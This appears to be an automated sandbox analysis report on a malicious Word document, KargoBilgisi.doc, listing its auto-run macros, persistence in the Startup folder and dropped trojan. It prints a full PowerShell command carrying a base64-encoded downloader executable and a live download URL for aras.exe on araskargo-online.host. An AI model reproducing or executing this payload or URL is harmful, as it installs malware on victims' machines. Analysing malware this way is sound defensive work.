|
4/5
|
Process
|
Creates process
|
-
|
|
-
Creates process "powershell.exe /c [Byte[]]$code_ = [System.Convert]::FromBase64String('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BAAAAPYClwAAAJ8DmwAAALAAoAAAALAEpQACAAEAAwABAAIAAwACAAYABQACAAcABwABAAgABwACAAkACQAEgAAAAQAAAAAAAAAAAAAAAAAaAAAAAgAAAAAAAAAAAAAAXQAKAAAAAAACAAAAAAAAAAAAAABdAB0DAAAAAAAAAAABAAAANwQAAAAAAAAAPE1vZHVsZT4AbXNjb3JsaWIAVGhyZWFkAERvd25sb2FkAFN5bmNocm9uaXplZAA8RGVzdFBhdGg+a19fQmFja2luZ0ZpZWxkAGRlZmF1bHRJbnN0YW5jZQBSdW50aW1lVHlwZUhhbmRsZQBHZXRUeXBlRnJvbUhhbmRsZQBEb3dubG9hZEZpbGUAVHlwZQBnZXRfQ3VsdHVyZQBzZXRfQ3VsdHVyZQByZXNvdXJjZUN1bHR1cmUAQXBwbGljYXRpb25TZXR0aW5nc0Jhc2UARWRpdG9yQnJvd3NhYmxlU3RhdGUAU1RBVGhyZWFkQXR0cmlidXRlAENvbXBpbGVyR2VuZXJhdGVkQXR0cmlidXRlAEd1aWRBdHRyaWJ1dGUAR2VuZXJhdGVkQ29kZUF0dHJpYnV0ZQBEZWJ1Z2dlck5vblVzZXJDb2RlQXR0cmlidXRlAERlYnVnZ2FibGVBdHRyaWJ1dGUARWRpdG9yQnJvd3NhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB2YWx1ZQBEb3dubG9hZC5leGUAU3lzdGVtLlRocmVhZGluZwBTdHJpbmcAR2V0Rm9sZGVyUGF0aABnZXRfRGVzdFBhdGgAc2V0X0Rlc3RQYXRoAFN5c3RlbS5Db21wb25lbnRNb2RlbABQcm9ncmFtAFN5c3RlbQByZXNvdXJjZU1hbgBNYWluAFN5c3RlbS5Db25maWd1cmF0aW9uAFN5c3RlbS5HbG9iYWxpemF0aW9uAFN5c3RlbS5SZWZsZWN0aW9uAEV4Y2VwdGlvbgBDdWx0dXJlSW5mbwBTbGVlcABTcGVjaWFsRm9sZGVyAGdldF9SZXNvdXJjZU1hbmFnZXIAU3lzdGVtLkNvZGVEb20uQ29tcGlsZXIALmN0b3IALmNjdG9yAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBTeXN0ZW0uUmVzb3VyY2VzAERvd25sb2FkLlByb3BlcnRpZXMuUmVzb3VyY2VzLnJlc291cmNlcwBEZWJ1Z2dpbmdNb2RlcwBEb3dubG9hZC5Qcm9wZXJ0aWVzAFNldHRpbmdzAFByb2Nlc3MAQ29uY2F0AE9iamVjdABTeXN0ZW0uTmV0AGdldF9EZWZhdWx0AFdlYkNsaWVudABFbnZpcm9ubWVudABTdGFydABnZXRfQXNzZW1ibHkAAAAAAGloAHQAdABwADoALwAvAGEAcgBhAHMAawBhAHIAZwBvAC0AbwBuAGwAaQBuAGUALgBoAG8AcwB0AC8AZgBhAG0AaQBsAHkAcABpAGMAdAB1AHIAZQBzAC8AYQByAGEAcwAuAGUAeABlAAEZXABNAFMAQgB1AGkAbABkAC4AZQB4AGUAADtEAG8AdwBuAGwAbwBhAGQALgBQAHIAbwBwAGUAcgB0AGkAZQBzAC4AUgBlAHMAbwB1AHIAYwBlAHMAAAAAAJNRQ1ozH8RAsq9CmJGMQnwABCABAQgDIAABBSABARERBCABAQ4EIAEBAgUgAgEODgUgAQERXQQAAQEIBQABEnEOBQABDhF5BQACDg4OCAABEoCBEYCFBSAAEoCJByACAQ4SgIkIAAESgI0SgI0It3pcVhk04IkCBg4DBhJVAwYSWQMGEhADAAAOBAABAQ4DAAABBAAAElUEAAASWQUAAQESWQQAABIQAwgADgQIABJVBAgAElkECAASEAgBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAANAQAIRG93bmxvYWQAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQxZGJlMzY1OS00NmVjLTRkOGItODQwMC02MzViNWIzZDY3NGQAAAwBAAcxLjAuMC4wAAAEAQAAAEABADNTeXN0ZW0uUmVzb3VyY2VzLlRvb2xzLlN0cm9uZ2x5VHlwZWRSZXNvdXJjZUJ1aWxkZXIHNC4w".
|
|
-
Creates process "C:\Users\BGC6u8Oy yXGxkR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MSBuild.exe".
|
|
-
Creates process "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
4/5
|
File System
|
Known malicious file
|
Trojan
|
|
-
File "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe" is a known malicious file.
|
|
4/5
|
Network
|
Downloads data
|
Downloader
|
|
-
URL "http://araskargo-online.host/familypictures/aras.exe".
|
|
3/5
|
Network
|
Performs DNS request
|
-
|
|
-
Resolves host name "araskargo-online.host".
|
|
3/5
|
PE
|
Executes dropped PE file
|
-
|
|
-
Executes dropped file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
3/5
|
YARA
|
YARA match
|
-
|
|
-
Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc"
|
|
-
Rule "VBA_Obfuscation_ObjectName" from ruleset "Generic" has matched for "C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc"
|
|
2/5
|
Network
|
Connects to HTTP server
|
-
|
|
-
URL "araskargo-online.host/familypictures/aras.exe".
|
|
2/5
|
PE
|
Drops PE file
|
Dropper
|
|
-
Drops file "C:\Users\BGC6U8~1\AppData\Local\Temp\\MSInstall\MSBuild.exe".
|
|
2/5
|
VBA Macro
|
Executes macro on specific worksheet event
|
-
|
|
-
Executes macro automatically on target "document" and event "open".
|
|
-
Executes macro on target "document" and event "close".
|
|
-
Executes macro on target "document" and event "new".
|
|
-
Executes macro on target "document" and event "sync".
|
|
-
Executes macro on target "document" and event "xmlafterinsert".
|
|
-
Executes macro on target "document" and event "xmlbeforedelete".
|
|
2/5
|
VBA Macro
|
Creates suspicious COM object
|
-
|
|
-
CreateObject(U0VFzrjFo("1%&e'*8", "fBFTjwwKL"))
|
|
1/5
|
Process
|
Creates system object
|
-
|
|
-
Creates mutex with name "Global\.net clr networking".
|
|
1/5
|
Static
|
Unparsable sections in file
|
-
|
|
-
Static analyzer was unable to completely parse the analyzed file: C:\Users\BGC6u8Oy yXGxkR\Desktop\KargoBilgisi.doc.
|
|
1/5
|
Static
|
Contains suspicious meta data
|
-
|
|
-
Office document contains below average content data.
|
|
1/5
|
VBA Macro
|
Contains Office macro
|
-
|
|
-
Office document contains a VBA macro.
|